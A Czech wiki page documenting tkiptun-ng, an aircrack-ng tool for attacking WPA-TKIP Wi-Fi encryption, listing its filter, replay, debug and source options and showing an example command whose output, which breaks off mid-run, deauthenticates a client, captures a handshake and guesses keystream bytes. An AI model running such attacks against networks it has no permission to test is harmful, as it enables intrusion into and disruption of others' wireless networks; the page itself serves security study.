Tkiptun-ng
Z AirDump WiKi
tkiptun-ng je nová implementace útoku na WPA-TKIP obsažena v poslední (listopad 2008) SVN Trunk verzi balíčku aircrack-ng. Nástroj je podrobně popsán v čánku TKIPtun-ng - První implementace útoku na WPA-TKIP šifrování.
Použití: tkiptun-ng
Filtrovací volby:
-d dmac : MAC adresa, Cíl -s smac : MAC adresa, Zdroj -m len : minimální délka paketu -n len : maximální dálka paketu -t tods : kontrolní rámec, To DS bit -f fromds : kontrolní rámec, From DS bit -D : vypnout detekci AP
Replay volby:
-x nbpps : počet paketů za sekundu -a bssid : nastav MAC adresu Access Pointu -c dmac : nastav MAC adresu cíle -h smac : nastav MAC adresu zdroje -F : vyber první vhodný paket -e essid : nastav SSID cílového AP
Volby pro Debug:
-K prga : proud klíčů pro pokračování -y file : soubor proudu klíčů pro pokračování -j : injektuj FromDS pakety -P pmk : pmk pro ověření nebo testování zranitelnosti -p psk : psk pro výpočet pmk s ESSID
Source options:
-i iface : zachytávat pakety z rozhraní (zadat rozhraní) -r file : extrahovat pakety z (zadat název) pcap souboru -help : zobrazí tuto nápovědu
Příklad použití
Příklad níže není kompletní ale stačí pro ilustraci toho jak útok funguje.
Vstup: tkiptun-ng -h 00:0F:B5:AB:CB:9D -a 00:14:6C:7E:40:80 -m 80 -n 100 ath0 Výstup:
Blub 2:38 E6 38 1C 24 15 1C CF Blub 1:17 DD 0D 69 1D C3 1F EE Blub 3:29 31 79 E7 E6 CF 8D 5E 14:48:00 Michael Test: Successful 14:48:00 Waiting for beacon frame (BSSID: 00:14:6C:7E:40:80) on channel 9 14:48:00 Found specified AP 14:48:00 Sending 4 directed DeAuth. STMAC: [00:0F:B5:AB:CB:9D] [ 2| 4 ACKs] 14:48:02 WPA handshake: 00:14:6C:7E:40:80 captured 14:48:02 Waiting for an ARP packet coming from the Client… Saving chosen packet in replay_src-1109-144822.cap 14:48:22 Waiting for an ARP response packet coming from the AP… Saving chosen packet in replay_src-1109-144822.cap 14:48:22 Got the answer! 14:48:22 Waiting 5 seconds to let encrypted EAPOL frames pass without interfering # Sent 40 packets, current guess: 27..
